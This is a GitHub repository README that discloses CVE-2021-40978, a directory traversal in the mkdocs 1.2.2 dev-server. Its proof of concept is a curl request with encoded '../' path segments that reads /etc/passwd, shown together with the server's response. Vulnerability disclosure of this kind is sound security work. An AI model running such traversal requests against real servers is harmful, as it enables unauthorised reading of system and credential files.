Skip to content

nisdn/CVE-2021-40978

main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 

CVE-2021-40978

mkdocs built-in dev-server directory traversal exploitation

Mkdocs 1.2.2 allows directory traversal through the built-in dev-server which responds on port 8000. There is below some examples of successfully exploited paths:

Impact

Using this tecnique it is possible to fetch files outside of the root directory, allowing anyone to read and download arbitrary files.

image

Request:

image

Response:

image

Proof Of Concept

Nuclei Template: https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-40978.yaml

curl http://0.0.0.0:8000/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd -i
HTTP/1.0 200 OK
Date: Mon, 04 Oct 2021 02:13:38 GMT
Server: WSGIServer/0.2 CPython/3.7.3
Content-Type: application/octet-stream
Content-Length: 2187

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync...

Screenshot_20211003_231812

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published